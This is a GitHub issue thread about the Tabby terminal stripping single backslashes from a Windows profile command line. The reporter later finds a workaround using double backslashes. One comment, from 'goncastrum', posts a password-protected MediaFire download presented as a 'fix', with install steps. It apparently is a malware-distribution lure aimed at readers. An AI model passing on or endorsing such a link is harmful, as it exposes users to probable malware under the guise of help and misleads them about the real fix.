### ISSUE TITLE
backslash cannot use in profile command line

### ISSUE THREAD

**Issue by Jaehaks** [Eugeny/tabby#9914]
**Describe the problem**:
I set the command line in new profile like this 
```cmd
cmd.exe /k %USERPROFILE%\.config\Dotfiles\clink\aliase.cmd
```
But it doesn't work.
When I restart tabby, the backslashs are deleted like this
```cmd
%USERPROFILE%.configDotfilesclinkaliase.cmd
```

It is weird that slash(/) and double backslash(\\) doesn't be deleted but only it happends to single backslash.

I'm Windows 10 user and installed the tabby by `scoop`

**To Reproduce**:
mentioned above

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Jaehaks** [comment]
I found that i have to use double back slash  and copy cmd(stock) not cmd(clink) to make new profile if i have settings already used
